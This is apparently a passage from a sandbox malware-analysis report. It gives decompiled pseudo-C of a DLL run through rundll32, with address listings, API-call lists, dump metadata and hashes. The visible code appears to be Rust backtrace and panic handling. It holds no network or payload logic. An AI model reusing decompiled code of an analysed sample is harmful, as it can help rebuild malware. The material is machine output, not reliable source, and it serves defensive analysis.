                                                                                                                                                                                      										 *(_t310 + 0x84) = 3;
                                                                                                                                                                                      										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
                                                                                                                                                                                      										 *(_t310 + 0xac) = 0;
                                                                                                                                                                                      										 *(_t310 + 0xb4) = 3;
                                                                                                                                                                                      										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
                                                                                                                                                                                      										 *(_t310 + 0x9c) = 0;
                                                                                                                                                                                      										 *(_t310 + 0xa4) = 3;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
                                                                                                                                                                                      											__eflags = _t227 - 1;
                                                                                                                                                                                      											if(_t227 != 1) {
                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
                                                                                                                                                                                      											 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      											_t235 = E6E9DE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
                                                                                                                                                                                      											_t308 =  *(_t310 + 0x1c);
                                                                                                                                                                                      											_t267 =  *(_t310 + 0x14);
                                                                                                                                                                                      											__eflags = _t235;
                                                                                                                                                                                      											if(_t235 != 0) {
                                                                                                                                                                                      												continue;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L47;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L47;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t221 = GetProcAddress( *0x6ea2e130, "StackWalkEx");
                                                                                                                                                                                      										__eflags = _t221;
                                                                                                                                                                                      										if(_t221 == 0) {
                                                                                                                                                                                      											E6E9EE9D0(_t308, _t310 + 0x80, 0, 0x100);
                                                                                                                                                                                      											_t324 = _t324 + 0xc;
                                                                                                                                                                                      											 *(_t310 + 0x74) = 0;
                                                                                                                                                                                      											 *(_t310 + 0x70) = 1;
                                                                                                                                                                                      											 *(_t310 + 0x188) = 0;
                                                                                                                                                                                      											 *(_t310 + 0x7c) = 0;
                                                                                                                                                                                      											 *(_t310 + 0x78) =  *(_t310 + 0x248);
                                                                                                                                                                                      											 *(_t310 + 0x84) = 3;
                                                                                                                                                                                      											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
                                                                                                                                                                                      											 *(_t310 + 0xac) = 0;
                                                                                                                                                                                      											 *(_t310 + 0xb4) = 3;
                                                                                                                                                                                      											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
                                                                                                                                                                                      											 *(_t310 + 0x9c) = 0;
                                                                                                                                                                                      											 *(_t310 + 0xa4) = 3;
                                                                                                                                                                                      											do {
                                                                                                                                                                                      												_t284 =  *0x6ea2e144; // 0x0
                                                                                                                                                                                      												__eflags = _t284;
                                                                                                                                                                                      												if(_t284 != 0) {
                                                                                                                                                                                      													L63:
                                                                                                                                                                                      													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
                                                                                                                                                                                      													__eflags = _t241 - 1;
                                                                                                                                                                                      													if(_t241 != 1) {
                                                                                                                                                                                      														L47:
                                                                                                                                                                                      														ReleaseMutex( *(_t310 + 0x58));
                                                                                                                                                                                      														__eflags =  *((char*)(_t310 + 0xf));
                                                                                                                                                                                      														if( *((char*)(_t310 + 0xf)) != 0) {
                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L48;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														goto L54;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L64;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t244 = GetProcAddress( *0x6ea2e130, "StackWalk64");
                                                                                                                                                                                      													__eflags = _t244;
                                                                                                                                                                                      													if(__eflags == 0) {
                                                                                                                                                                                      														 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      														E6E9F94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      														goto L70;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														_t284 = _t244;
                                                                                                                                                                                      														 *0x6ea2e144 = _t244;
                                                                                                                                                                                      														goto L63;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L71;
                                                                                                                                                                                      												L64:
                                                                                                                                                                                      												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
                                                                                                                                                                                      												 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      												_t243 = E6E9DE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
                                                                                                                                                                                      												_t308 =  *(_t310 + 0x1c);
                                                                                                                                                                                      												_t267 =  *(_t310 + 0x14);
                                                                                                                                                                                      												__eflags = _t243;
                                                                                                                                                                                      											} while (_t243 != 0);
                                                                                                                                                                                      											goto L47;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											 *0x6ea2e158 = _t221;
                                                                                                                                                                                      											goto L44;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									L39:
                                                                                                                                                                                      									_t246 = GetProcAddress( *0x6ea2e130, "SymGetModuleBase64");
                                                                                                                                                                                      									__eflags = _t246;
                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                      										 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      										E6E9F94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      										L70:
                                                                                                                                                                                      										asm("ud2");
                                                                                                                                                                                      										_push(_t313);
                                                                                                                                                                                      										return E6E9DE6D0( *((intOrPtr*)( &_v1456 + 0x58)));
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t267 = _t246;
                                                                                                                                                                                      										 *0x6ea2e14c = _t246;
                                                                                                                                                                                      										goto L41;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eflags =  *((char*)(_t310 + 0xf));
                                                                                                                                                                                      							if( *((char*)(_t310 + 0xf)) != 0) {
                                                                                                                                                                                      								goto L50;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L48:
                                                                                                                                                                                      								__eflags =  *(_t310 + 0xe);
                                                                                                                                                                                      								if( *(_t310 + 0xe) != 0) {
                                                                                                                                                                                      									L55:
                                                                                                                                                                                      									_t229 =  *(_t310 + 0x5c);
                                                                                                                                                                                      									__eflags = _t229;
                                                                                                                                                                                      									if(_t229 != 0) {
                                                                                                                                                                                      										__eflags =  *(_t310 + 0x60);
                                                                                                                                                                                      										if( *(_t310 + 0x60) != 0) {
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _t229);
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t206 = 0;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									 *(_t310 + 0x190) = 0x6ea1fe4c;
                                                                                                                                                                                      									 *(_t310 + 0x194) = 1;
                                                                                                                                                                                      									 *(_t310 + 0x198) = 0;
                                                                                                                                                                                      									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ea1f570;
                                                                                                                                                                                      									 *(_t310 + 0x1a4) = 0;
                                                                                                                                                                                      									 *(_t310 + 0x5a8) = 2;
                                                                                                                                                                                      									_push(_t310 + 0x190);
                                                                                                                                                                                      									_t233 = E6E9D2150( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
                                                                                                                                                                                      									__eflags = _t233;
                                                                                                                                                                                      									if(_t233 == 0) {
                                                                                                                                                                                      										goto L55;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L50;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L54:
                                                                                                                                                                                      							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
                                                                                                                                                                                      							return _t206;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L71:
                                                                                                                                                                                      			}



















































                                                                                                                                                                                      0x6e9ddd33
                                                                                                                                                                                      0x6e9ddd34
                                                                                                                                                                                      0x6e9ddd35
                                                                                                                                                                                      0x6e9ddd39
                                                                                                                                                                                      0x6e9ddd3f
                                                                                                                                                                                      0x6e9ddd41
                                                                                                                                                                                      0x6e9ddd47
                                                                                                                                                                                      0x6e9ddd4d
                                                                                                                                                                                      0x6e9ddd57
                                                                                                                                                                                      0x6e9ddd71
                                                                                                                                                                                      0x6e9ddd77
                                                                                                                                                                                      0x6e9ddd7e
                                                                                                                                                                                      0x6e9ddd80
                                                                                                                                                                                      0x6e9ddd83
                                                                                                                                                                                      0x6e9ddd94
                                                                                                                                                                                      0x6e9ddd99
                                                                                                                                                                                      0x6e9ddd9c
                                                                                                                                                                                      0x6e9ddda1
                                                                                                                                                                                      0x6e9ddda6
                                                                                                                                                                                      0x6e9dddad
                                                                                                                                                                                      0x6e9dddb0
                                                                                                                                                                                      0x6e9dddb7
                                                                                                                                                                                      0x6e9dddba
                                                                                                                                                                                      0x6e9dddc7
                                                                                                                                                                                      0x6e9dddca
                                                                                                                                                                                      0x6e9ddde6
                                                                                                                                                                                      0x6e9ddde6
                                                                                                                                                                                      0x6e9dddec
                                                                                                                                                                                      0x6e9dddf0
                                                                                                                                                                                      0x6e9dddf2
                                                                                                                                                                                      0x6e9dddf4
                                                                                                                                                                                      0x6e9dddfe
                                                                                                                                                                                      0x6e9dde02
                                                                                                                                                                                      0x6e9dde07
                                                                                                                                                                                      0x6e9dde0d
                                                                                                                                                                                      0x6e9dde0d
                                                                                                                                                                                      0x6e9dde10
                                                                                                                                                                                      0x6e9dde13
                                                                                                                                                                                      0x6e9dde16
                                                                                                                                                                                      0x6e9dde19
                                                                                                                                                                                      0x6e9dde1c
                                                                                                                                                                                      0x6e9dde1f
                                                                                                                                                                                      0x6e9dddcc
                                                                                                                                                                                      0x6e9dde30
                                                                                                                                                                                      0x6e9dde30
                                                                                                                                                                                      0x6e9dde36
                                                                                                                                                                                      0x6e9dde3d
                                                                                                                                                                                      0x6e9dde3d
                                                                                                                                                                                      0x6e9dde40
                                                                                                                                                                                      0x6e9dde42
                                                                                                                                                                                      0x6e9dde4a
                                                                                                                                                                                      0x6e9dde50
                                                                                                                                                                                      0x6e9dde54
                                                                                                                                                                                      0x6e9dde62
                                                                                                                                                                                      0x6e9dddd0
                                                                                                                                                                                      0x6e9dddd3
                                                                                                                                                                                      0x6e9dddd5
                                                                                                                                                                                      0x6e9dde8d
                                                                                                                                                                                      0x6e9dde90
                                                                                                                                                                                      0x6e9dde9a
                                                                                                                                                                                      0x6e9dde9c
                                                                                                                                                                                      0x6e9de3b8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddea2
                                                                                                                                                                                      0x6e9ddea2
                                                                                                                                                                                      0x6e9ddea5
                                                                                                                                                                                      0x6e9ddea8
                                                                                                                                                                                      0x6e9ddea9
                                                                                                                                                                                      0x6e9ddeae
                                                                                                                                                                                      0x6e9ddeb4
                                                                                                                                                                                      0x6e9ddeb9
                                                                                                                                                                                      0x6e9ddebb
                                                                                                                                                                                      0x6e9ddebe
                                                                                                                                                                                      0x6e9ddec3
                                                                                                                                                                                      0x6e9ddec6
                                                                                                                                                                                      0x6e9ddec8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddeca
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddec8
                                                                                                                                                                                      0x6e9ddddb
                                                                                                                                                                                      0x6e9ddddb
                                                                                                                                                                                      0x6e9ddde1
                                                                                                                                                                                      0x6e9ddde4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddde4
                                                                                                                                                                                      0x6e9dde77
                                                                                                                                                                                      0x6e9dde7a
                                                                                                                                                                                      0x6e9dde82
                                                                                                                                                                                      0x6e9dde85
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dde8b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dde8b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dde85
                                                                                                                                                                                      0x6e9ddecc
                                                                                                                                                                                      0x6e9ddecc
                                                                                                                                                                                      0x6e9dded2
                                                                                                                                                                                      0x6e9dded4
                                                                                                                                                                                      0x6e9dded7
                                                                                                                                                                                      0x6e9ddede
                                                                                                                                                                                      0x6e9ddee1
                                                                                                                                                                                      0x6e9ddee3
                                                                                                                                                                                      0x6e9ddee5
                                                                                                                                                                                      0x6e9ddee5
                                                                                                                                                                                      0x6e9ddee9
                                                                                                                                                                                      0x6e9ddeeb
                                                                                                                                                                                      0x6e9ddef0
                                                                                                                                                                                      0x6e9ddefd
                                                                                                                                                                                      0x6e9ddefd
                                                                                                                                                                                      0x6e9ddef0
                                                                                                                                                                                      0x6e9ddee9
                                                                                                                                                                                      0x6e9ddf02
                                                                                                                                                                                      0x6e9ddf02
                                                                                                                                                                                      0x6e9ddf04
                                                                                                                                                                                      0x6e9ddf6e
                                                                                                                                                                                      0x6e9ddf71
                                                                                                                                                                                      0x6e9ddf74
                                                                                                                                                                                      0x6e9ddf77
                                                                                                                                                                                      0x6e9ddf7a
                                                                                                                                                                                      0x6e9ddf06
                                                                                                                                                                                      0x6e9ddf06
                                                                                                                                                                                      0x6e9ddf0a
                                                                                                                                                                                      0x6e9ddf0c
                                                                                                                                                                                      0x6e9ddf11
                                                                                                                                                                                      0x6e9ddf17
                                                                                                                                                                                      0x6e9ddf22
                                                                                                                                                                                      0x6e9ddf24
                                                                                                                                                                                      0x6e9ddf27
                                                                                                                                                                                      0x6e9ddf2a
                                                                                                                                                                                      0x6e9ddf2d
                                                                                                                                                                                      0x6e9ddf31
                                                                                                                                                                                      0x6e9ddf33
                                                                                                                                                                                      0x6e9ddf35
                                                                                                                                                                                      0x6e9ddf39
                                                                                                                                                                                      0x6e9ddf3b
                                                                                                                                                                                      0x6e9ddf3b
                                                                                                                                                                                      0x6e9ddf47
                                                                                                                                                                                      0x6e9ddf4c
                                                                                                                                                                                      0x6e9ddf4c
                                                                                                                                                                                      0x6e9ddf58
                                                                                                                                                                                      0x6e9ddf58
                                                                                                                                                                                      0x6e9ddf5d
                                                                                                                                                                                      0x6e9ddf60
                                                                                                                                                                                      0x6e9ddf62
                                                                                                                                                                                      0x6e9ddf62
                                                                                                                                                                                      0x6e9ddf84
                                                                                                                                                                                      0x6e9ddf87
                                                                                                                                                                                      0x6e9ddf8d
                                                                                                                                                                                      0x6e9ddf90
                                                                                                                                                                                      0x6e9ddf93
                                                                                                                                                                                      0x6e9ddf9d
                                                                                                                                                                                      0x6e9ddfa7
                                                                                                                                                                                      0x6e9ddfb1
                                                                                                                                                                                      0x6e9ddfbb
                                                                                                                                                                                      0x6e9ddfc8
                                                                                                                                                                                      0x6e9ddfd1
                                                                                                                                                                                      0x6e9ddfd2
                                                                                                                                                                                      0x6e9ddfd7
                                                                                                                                                                                      0x6e9ddfda
                                                                                                                                                                                      0x6e9ddfdc
                                                                                                                                                                                      0x6e9de255
                                                                                                                                                                                      0x6e9de255
                                                                                                                                                                                      0x6e9de258
                                                                                                                                                                                      0x6e9de25a
                                                                                                                                                                                      0x6e9de25c
                                                                                                                                                                                      0x6e9de260
                                                                                                                                                                                      0x6e9de26b
                                                                                                                                                                                      0x6e9de26b
                                                                                                                                                                                      0x6e9de260
                                                                                                                                                                                      0x6e9de270
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddfe2
                                                                                                                                                                                      0x6e9ddfe2
                                                                                                                                                                                      0x6e9ddfe8
                                                                                                                                                                                      0x6e9ddfef
                                                                                                                                                                                      0x6e9ddff3
                                                                                                                                                                                      0x6e9ddff6
                                                                                                                                                                                      0x6e9ddffd
                                                                                                                                                                                      0x6e9ddfff
                                                                                                                                                                                      0x6e9de008
                                                                                                                                                                                      0x6e9de00e
                                                                                                                                                                                      0x6e9de011
                                                                                                                                                                                      0x6e9de018
                                                                                                                                                                                      0x6e9de01c
                                                                                                                                                                                      0x6e9de022
                                                                                                                                                                                      0x6e9de028
                                                                                                                                                                                      0x6e9de02e
                                                                                                                                                                                      0x6e9de036
                                                                                                                                                                                      0x6e9de03f
                                                                                                                                                                                      0x6e9de049
                                                                                                                                                                                      0x6e9de050
                                                                                                                                                                                      0x6e9de055
                                                                                                                                                                                      0x6e9de058
                                                                                                                                                                                      0x6e9de059
                                                                                                                                                                                      0x6e9de05e
                                                                                                                                                                                      0x6e9de063
                                                                                                                                                                                      0x6e9de065
                                                                                                                                                                                      0x6e9de076
                                                                                                                                                                                      0x6e9de07c
                                                                                                                                                                                      0x6e9de07f
                                                                                                                                                                                      0x6e9de081
                                                                                                                                                                                      0x6e9de09a
                                                                                                                                                                                      0x6e9de0a0
                                                                                                                                                                                      0x6e9de0a2
                                                                                                                                                                                      0x6e9de3e5
                                                                                                                                                                                      0x6e9de3fe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0a8
                                                                                                                                                                                      0x6e9de0a8
                                                                                                                                                                                      0x6e9de0aa
                                                                                                                                                                                      0x6e9de0af
                                                                                                                                                                                      0x6e9de0b5
                                                                                                                                                                                      0x6e9de0b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0b7
                                                                                                                                                                                      0x6e9de083
                                                                                                                                                                                      0x6e9de083
                                                                                                                                                                                      0x6e9de089
                                                                                                                                                                                      0x6e9de08b
                                                                                                                                                                                      0x6e9de0d9
                                                                                                                                                                                      0x6e9de0de
                                                                                                                                                                                      0x6e9de0e1
                                                                                                                                                                                      0x6e9de0e6
                                                                                                                                                                                      0x6e9de0e9
                                                                                                                                                                                      0x6e9de0ec
                                                                                                                                                                                      0x6e9de0ee
                                                                                                                                                                                      0x6e9de10e
                                                                                                                                                                                      0x6e9de10e
                                                                                                                                                                                      0x6e9de117
                                                                                                                                                                                      0x6e9de11e
                                                                                                                                                                                      0x6e9de12d
                                                                                                                                                                                      0x6e9de132
                                                                                                                                                                                      0x6e9de147
                                                                                                                                                                                      0x6e9de14e
                                                                                                                                                                                      0x6e9de151
                                                                                                                                                                                      0x6e9de15b
                                                                                                                                                                                      0x6e9de161
                                                                                                                                                                                      0x6e9de16b
                                                                                                                                                                                      0x6e9de175
                                                                                                                                                                                      0x6e9de17b
                                                                                                                                                                                      0x6e9de185
                                                                                                                                                                                      0x6e9de190
                                                                                                                                                                                      0x6e9de1ae
                                                                                                                                                                                      0x6e9de1b1
                                                                                                                                                                                      0x6e9de1b4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de1c6
                                                                                                                                                                                      0x6e9de1cc
                                                                                                                                                                                      0x6e9de1d6
                                                                                                                                                                                      0x6e9de1db
                                                                                                                                                                                      0x6e9de1de
                                                                                                                                                                                      0x6e9de1e1
                                                                                                                                                                                      0x6e9de1e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de1e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0f0
                                                                                                                                                                                      0x6e9de0fb
                                                                                                                                                                                      0x6e9de101
                                                                                                                                                                                      0x6e9de103
                                                                                                                                                                                      0x6e9de2b4
                                                                                                                                                                                      0x6e9de2b9
                                                                                                                                                                                      0x6e9de2ce
                                                                                                                                                                                      0x6e9de2d5
                                                                                                                                                                                      0x6e9de2dc
                                                                                                                                                                                      0x6e9de2e6
                                                                                                                                                                                      0x6e9de2ed
                                                                                                                                                                                      0x6e9de2f0
                                                                                                                                                                                      0x6e9de2fa
                                                                                                                                                                                      0x6e9de300
                                                                                                                                                                                      0x6e9de30a
                                                                                                                                                                                      0x6e9de314
                                                                                                                                                                                      0x6e9de31a
                                                                                                                                                                                      0x6e9de324
                                                                                                                                                                                      0x6e9de330
                                                                                                                                                                                      0x6e9de330
                                                                                                                                                                                      0x6e9de336
                                                                                                                                                                                      0x6e9de338
                                                                                                                                                                                      0x6e9de356
                                                                                                                                                                                      0x6e9de372
                                                                                                                                                                                      0x6e9de374
                                                                                                                                                                                      0x6e9de377
                                                                                                                                                                                      0x6e9de1e5
                                                                                                                                                                                      0x6e9de1e8
                                                                                                                                                                                      0x6e9de1ed
                                                                                                                                                                                      0x6e9de1f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de33a
                                                                                                                                                                                      0x6e9de345
                                                                                                                                                                                      0x6e9de34b
                                                                                                                                                                                      0x6e9de34d
                                                                                                                                                                                      0x6e9de3c2
                                                                                                                                                                                      0x6e9de3db
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de34f
                                                                                                                                                                                      0x6e9de34f
                                                                                                                                                                                      0x6e9de351
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de351
                                                                                                                                                                                      0x6e9de34d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de37d
                                                                                                                                                                                      0x6e9de38d
                                                                                                                                                                                      0x6e9de393
                                                                                                                                                                                      0x6e9de39d
                                                                                                                                                                                      0x6e9de3a2
                                                                                                                                                                                      0x6e9de3a5
                                                                                                                                                                                      0x6e9de3a8
                                                                                                                                                                                      0x6e9de3a8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de109
                                                                                                                                                                                      0x6e9de109
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de109
                                                                                                                                                                                      0x6e9de103
                                                                                                                                                                                      0x6e9de08d
                                                                                                                                                                                      0x6e9de0b9
                                                                                                                                                                                      0x6e9de0c4
                                                                                                                                                                                      0x6e9de0ca
                                                                                                                                                                                      0x6e9de0cc
                                                                                                                                                                                      0x6e9de408
                                                                                                                                                                                      0x6e9de421
                                                                                                                                                                                      0x6e9de429
                                                                                                                                                                                      0x6e9de429
                                                                                                                                                                                      0x6e9de430
                                                                                                                                                                                      0x6e9de44c
                                                                                                                                                                                      0x6e9de0d2
                                                                                                                                                                                      0x6e9de0d2
                                                                                                                                                                                      0x6e9de0d4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0d4
                                                                                                                                                                                      0x6e9de0cc
                                                                                                                                                                                      0x6e9de08b
                                                                                                                                                                                      0x6e9de067
                                                                                                                                                                                      0x6e9de067
                                                                                                                                                                                      0x6e9de06b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de071
                                                                                                                                                                                      0x6e9de1f3
                                                                                                                                                                                      0x6e9de1f3
                                                                                                                                                                                      0x6e9de1f7
                                                                                                                                                                                      0x6e9de287
                                                                                                                                                                                      0x6e9de287
                                                                                                                                                                                      0x6e9de28a
                                                                                                                                                                                      0x6e9de28c
                                                                                                                                                                                      0x6e9de28e
                                                                                                                                                                                      0x6e9de292
                                                                                                                                                                                      0x6e9de29d
                                                                                                                                                                                      0x6e9de29d
                                                                                                                                                                                      0x6e9de292
                                                                                                                                                                                      0x6e9de2a2
                                                                                                                                                                                      0x6e9de1fd
                                                                                                                                                                                      0x6e9de200
                                                                                                                                                                                      0x6e9de20a
                                                                                                                                                                                      0x6e9de214
                                                                                                                                                                                      0x6e9de21e
                                                                                                                                                                                      0x6e9de228
                                                                                                                                                                                      0x6e9de232
                                                                                                                                                                                      0x6e9de248
                                                                                                                                                                                      0x6e9de249
                                                                                                                                                                                      0x6e9de251
                                                                                                                                                                                      0x6e9de253
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de253
                                                                                                                                                                                      0x6e9de1f7
                                                                                                                                                                                      0x6e9de272
                                                                                                                                                                                      0x6e9de278
                                                                                                                                                                                      0x6e9de286
                                                                                                                                                                                      0x6e9de286
                                                                                                                                                                                      0x6e9de065
                                                                                                                                                                                      0x6e9ddfdc
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6E9DDE42
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6E9DDE4A
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9DDE56
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9DDE68
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9DDECC
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DDEFD
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DDF47
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DDF58
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 6E9DE031
                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 6E9DE039
                                                                                                                                                                                      • RtlCaptureContext.KERNEL32(?), ref: 6E9DE059
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6E9DE09A
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6E9DE0C4
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6E9DE0D9
                                                                                                                                                                                      • GetProcAddress.KERNEL32(StackWalkEx), ref: 6E9DE0FB
                                                                                                                                                                                      • ReleaseMutex.KERNEL32(?), ref: 6E9DE1E8
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DE26B
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?), ref: 6E9DE29D
                                                                                                                                                                                      • GetProcAddress.KERNEL32(StackWalk64), ref: 6E9DE345
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                                                                                                                                                                                      • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                                                                                                                                                                                      • API String ID: 1381040140-1036201984
                                                                                                                                                                                      • Opcode ID: af14222981e0c47116c8b344feb081df3f796735aa5f17c84b8f318d60bd041c
                                                                                                                                                                                      • Instruction ID: ab3c560228fd52944de1ec3379aeffbc481e51d2bf910355a766b105a1130de8
                                                                                                                                                                                      • Opcode Fuzzy Hash: af14222981e0c47116c8b344feb081df3f796735aa5f17c84b8f318d60bd041c
                                                                                                                                                                                      • Instruction Fuzzy Hash: E11215B0A04F009FE721CFA5C994B93BBE8BF59304F04892DD5AA9A690D771F449CF51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                                                                      			E6E9DC700(long _a4, signed int _a8) {
                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				void* _v40;
                                                                                                                                                                                      				char _v41;
                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                      				long* _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				long _v60;
                                                                                                                                                                                      				void _v64;
                                                                                                                                                                                      				long* _v68;
                                                                                                                                                                                      				long _v72;
                                                                                                                                                                                      				char _v76;
                                                                                                                                                                                      				long* _v80;
                                                                                                                                                                                      				void* _v84;
                                                                                                                                                                                      				char _v88;
                                                                                                                                                                                      				long _v92;
                                                                                                                                                                                      				char* _v96;
                                                                                                                                                                                      				long _v100;
                                                                                                                                                                                      				void* _v104;
                                                                                                                                                                                      				void** _v108;
